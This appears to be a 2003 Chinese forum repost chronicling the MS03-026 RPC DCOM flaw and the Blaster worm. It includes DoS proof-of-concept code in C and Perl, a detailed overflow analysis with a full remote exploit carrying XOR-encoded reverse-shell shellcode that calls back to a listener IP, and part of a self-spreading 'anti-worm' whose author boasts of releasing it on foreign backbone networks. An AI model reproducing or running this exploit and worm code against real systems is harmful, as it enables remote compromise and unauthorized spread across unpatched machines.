枫林在线精华区>>信息安全>>黑客技术
[100904] 主题: 冲击波内幕点滴
作者: leaflet (Leaf)
标题: 冲击波内幕点滴[转载]
来自: 218.78.*.*
发贴时间: 2003年09月16日 10:40:19
长度: 3134字
 cjlong(原作)

冲击波内幕点滴

作者:幽谷听泉

时间:2003-07-21 上午 人物:flashsky

发现了MS WINDOWS 2000 RPC拒绝服务与本地权限提升漏洞,并提供了完整的测试代码(见
附1)。

时间:2003-07-21 下午

微软实现了该漏洞,并发布该漏洞的公告:MS03-026:RPC接口任意代码可执行漏洞

时间:2003-07-22

微软发布了针对该漏洞的补丁程序

http://www.microsoft.com/china/technet/security/bulletin/MS03-026.asp

时间:2003-07-25 09:13 人物:flashsky

在国内的某著名论坛上发表了lsd rpc溢出全分析的文章,公布了实现rpc溢出漏洞的代
码,并详细讲述了基本原理(全文见附2)。

时间:2003-07-25到2003-07-28

在该论坛上众路英雄纷纷对flashsky提供的代码进行了修改

时间:2003-8-2 发现:Worm.SdBotRPC “流言”病毒

利用RPC的漏洞攻击网络中的计算机,攻击成功后向远端系统上的RPC系统服务所监听的
端口发送攻击代码,造成远端系统无法使用RPC服务或系统崩溃。

时间:2003-8-8  发现:用VB编程语言编写的Worm.AutoRooter病毒

时间:2003-8-10  发现了著名的冲击波(Worm.Blaster)病毒

时间:2003-08-15 美国媒体表态:"冲击波"病毒涉嫌造成大停电

http://www.duba.net/c/2003/08/15/89250.shtml

时间:2003-08-18 出现了以虫制虫的良性蠕虫,我目前还不知道该病毒的名称,先借用
网上的名称 蠕虫2004,该病毒同样通过RPC的漏洞攻击网络中的计算机,蠕虫感染系统
后会自动清除系统中的冲击波病毒,然后根据系统语言版本是简体中文、繁体中文、韩
文、英文以及系统是Windows 2000还是Windows XP分别到微软站点下载相应的MS03-026补
丁,并能检测系统时间,如果系统时间是2004年,就自动清除自身。

时间:2003-8-20 人物:peipei

蠕虫2004作者在某著名论坛现身,并公布了原代码(见附件3),全文如下:

玩过了~~ 虫虫四个小时之内已经完成了任务~~~不得不写这豆腐块~~~
char *szMe = "=========== I love my wife & baby :)~~~ Welcome Chian~~~
Notice: 2004 will remove myself:)~~ sorry zhongli~~~=========== wins";

偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
0 chian 系 china 笔误~~ 敲的快了,某个指头先到:)~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom & WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k & xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon(TM) 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 :)~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~

========== * * * * * ==========
作者: leaflet (Leaf)
标题: 冲击波内幕点滴(二)
来自: 218.78.*.*
发贴时间: 2003年09月16日 10:40:50
长度: 3448字
附1

测试代码

#include

#include

#include

#include

#include

#include

 

unsigned char bindstr={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0
x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0
x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0
x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0
x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

 

unsigned char request={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0
x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0
x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0
x31,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0
x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

 

 

 

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

 

short port=135;

unsigned char buf1;

printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
 

printf("Welcome to http://www.xfocus.net\n");

if(argc<2)

{

printf("useage:%s target\n",argv);

exit(1);

}

 

 

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d\n",WSAGetLastError());

return;

}

 

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv);

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d\n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,N
ULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

 

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

 

 

#!/usr/bin/perl -w

# By SecurITeam's Experts

my $bindstr = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x7F\x00\x00\x00
\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xA0\x01\x00
\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5D
\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

 

my $request = "\x05\x00\x00\x03\x10\x00\x00\x00\x48\x00\x00\x00\x13\x00\x00\x00
\x90\x00\x00\x00\x01\x00\x03\x00\x05\x00\x06\x01\x00\x00\x00\x00\x31\x31\x31
\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31
\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x00\x00\x00\x00\x00\x00\x00\x00";

 

use Socket;

$proto = getprotobyname('tcp');

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n");

 

$IP = $ARGV;

$target = inet_aton($IP);

$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;

sleep(2);

select(STDOUT);

close(S);


========== * * * * * ==========
作者: leaflet (Leaf)
标题: 冲击波内幕点滴(三)
来自: 218.78.*.*
发贴时间: 2003年09月16日 10:41:36
长度: 14866字


附2

LSD RPC 溢出漏洞之分析

转摘请注明作者和安全焦点

作者:FLASHSKY

作者单位:启明星辰积极防御实验室

WWW SITE:WWW.VENUSTECH.COM.CN WWW.XFOCUS.NET,WWW.SHOPSKY.COM

邮件:flashsky@xfocus.org,fangxing@venustech.com.cn,webmaster@shopsky.com

感谢BENJURRY做测试,翻译和代码的通用化处理。

邮件:benjurry@xfocus.org

 

LSD 的RPC溢出漏洞(MS03-26)其实包含了2个溢出漏洞,一个是本地的,一个是远程的
。他们都是由一个通用接口导致的。

导致问题的调用如下:

hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWR
ITE,L"C:\\1234561111111111111111111111111.doc",1,&qi);

这个调用的文件名参数(第5个参数,会引起溢出),当这个文件名超长的时候,会导
致客户端的本地溢出(在RPCSS中的GetPathForServer函数里只给了0X220堆栈的空间,
但是是用lstrcpyw进行拷贝的),这个我们在这里就不深入研究了(不过这个API先会检
查本地文件是否存在,在进行处理,因此由于建不了长文件,所以要利用这个溢出不能
直接调用这个API,而是构造好包信息以后直接调用LPC的函数,有兴趣的可以自己去试
。),我们来讲解一下远程的溢出。

在客户端给服务器传递这个参数的时候,会自动转化成如下格式:L“\\servername\c$
\1234561111111111111111111111111.doc"这样的形式传递给远程服务器,于是在远程
服务器的处理中会先取出servername名,但是这里没做检查,给定了0X20(默认NETBIO
S名)大小的空间,于是堆栈溢出产生了:

问题代码如下:

GetPathForServer:

.text:761543DA push ebp

.text:761543DB mov ebp, esp

.text:761543DD sub esp, 20h <-----0x20空间

.text:761543E0 mov eax,

.text:761543E3 push ebx

.text:761543E4 push esi

.text:761543E5 mov esi,

.text:761543E8 push edi

.text:761543E9 push 5Ch

.text:761543EB pop ebx

.text:761543EC mov , esi

.text:761543EE cmp , bx

.text:761543F1 mov edi, esi

.text:761543F3 jnz loc_761544BF

.text:761543F9 cmp , bx

.text:761543FD jnz loc_761544BF

.text:76154403 lea eax, 《-----------写入的地址,只有0X20

.text:76154406 push 0

.text:76154408 push eax

.text:76154409 push esi 〈----------------------我们传入的文件名参数

.text:7615440A call GetMachineName

。。。。。。。。。。。。。。。。。。。。。。。。。。 此函数返回的时候,溢出点
生效

 

GetMachineName:

.text:7614DB6F mov eax,

.text:7614DB72 mov ecx,

.text:7614DB75 lea edx,

.text:7614DB78 mov ax,

.text:7614DB7C cmp ax, 5Ch 〈-----------------只判断0X5C

.text:7614DB80 jz short loc_7614DB93

.text:7614DB82 sub edx, ecx

.text:7614DB84

.text:7614DB84 loc_7614DB84: ; CODE XREF: sub_7614DA19+178j

.text:7614DB84 mov , ax 〈----------------写入上个只有0X20的空间,超过就溢出

.text:7614DB87 inc ecx

.text:7614DB88 inc ecx

.text:7614DB89 mov ax,

.text:7614DB8D cmp ax, 5Ch

.text:7614DB91 jnz short loc_7614DB84

.text:7614DB93

 

OK,我们现在就需要想法来利用这个漏洞,由于\\SERVERNAME是由系统自动生成的,我
们只能利用手工直接生成RPC的包来实现,另外SHELLCODE中不能包含0X5C,因为这样判
断就是\\SERVERNAME结束了。

下面就给出一个实现的代码,注意点如下:

1.由于RPCRT4,RPCSS中没有JMP ESP的代码,这里使用了OLE32.DLL中的,但是这可能是
会重定位的,大家测试的时候

需要再确定或自己找一个存在的JMP ESP的代脉,我的这是WIN2000+SP3上的地址且OLE32
未重定位情况下的。

2。这里使用了反向连接的SHELLCODE,需要先运行NC

3。程序中的SC的整体长度必须满足sizeof(sz)%16=12的关系,因为不是整数的话,整
个包的长度会有一些填充,那么

计算就不满足我这里给出的一个简单关系了,会导致RPC包的解析无效果。

4。在溢出返回前,返回地址后面的2个参数还会使用,所以需要保证是个内存可写空间
地址。

5,这里是直接使用堆栈溢出返回的,其实大家也可以尝试一下覆盖SEH,这里就不再多
讲了。

 

#include <stdio.h>

#include <winsock2.h>

#include <windows.h>

#include <process.h>

#include <string.h>

#include <winbase.h>

 

unsigned char bindstr={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0
x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0
x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0
x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

 

unsigned char request1={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,
0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,
0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,
0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,
0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,
0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,
0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,
0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,
0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,
0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,
0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,
0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,
0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,
0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,
0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,
0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,
0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,
0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,
0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,
0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,
0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,
0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,
0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,
0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,
0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,
0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,
0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,
0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,
0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,
0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

 

unsigned char request2={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

 

unsigned char request3={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,
0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

 

unsigned char sc=

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00"

"\x46\x00\x58\x00\x25\x2b\xaa\x77" //JMP ESP地址 IN ole32.DLL,可能需要自己改动


"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //需要是可写的内存地址

//下面是SHELLCODE,可以放自己的SHELLCODE,但必须保证sc的整体长度/16=12,不满
足自己填充一些0X90吧

//SHELLCODE不存在0X00,0X00与0X5C

"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"

"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"

"\x93\x40\xe2\xfa"

// code

"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"

"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"

"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"

"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"

"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"

"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"

"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"

"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"

"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"

"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"

"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"

"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"

"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"

"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"

"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"

"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"

"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"

"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"

"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"

"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"

"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"

"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"

"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"

"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"

"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

 

unsigned char request4={

0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,
0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,
0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00

};

 

void main(int argc,char ** argv)

{

WSADATA WSAData;

SOCKET sock;

int len,len1;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1;

unsigned char buf2;

unsigned short port1;

DWORD cb;

 

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d\n",WSAGetLastError());

return;

}

 

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv);

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d\n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,N
ULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

port1 = htons (2300); //反向连接的端口

port1 ^= 0x9393;

cb=0XD20AA8C0; //反向连接的IP地址,这里是192。168。10。210,

cb ^= 0x93939393;

*(unsigned short *)&sc = port1;

*(unsigned int *)&sc = cb;

len=sizeof(sc);

memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //计算文件名双字节长度


*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节
长度

memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2);

memcpy(buf2+len1,sc,sizeof(sc));

len1=len1+sizeof(sc);

memcpy(buf2+len1,request3,sizeof(request3));

len1=len1+sizeof(request3);

memcpy(buf2+len1,request4,sizeof(request4));

len1=len1+sizeof(request4);

*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

//计算各种结构的长度

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

 

len=recv(sock,buf1,1000,NULL);

if (send(sock,buf2,len1,0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

len=recv(sock,buf1,1024,NULL);

}

 

补丁机理:

补丁把远程和本地的溢出都补了,呵呵,这个这么有名的东西,我也懒得多说了。

 

补记:

由于缺乏更多的技术细节,搞这个从上星期五到现在终于才搞定,惭愧,不过值得庆幸
的是其间发现了RPC DCOM DOS的漏洞。先开始被本地溢出的迷惑了很久,怎么也无法远程
进入这个函数,最后偶然的一次,让我错误的看花了眼,再远程调用的时候,以为GETS
ERVERPATH是存在本地溢出的GetPathForServer函数,,心中以为远程进入了GetPathFo
rServer函数,仔细的跟踪,这才发现问题所在。感谢所有关心和指导我的同志们。


========== * * * * * ==========
作者: leaflet (Leaf)
标题: 冲击波内幕点滴(四)
来自: 218.78.*.*
发贴时间: 2003年09月16日 10:42:50
长度: 5771字

附3

BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了

//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);


if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
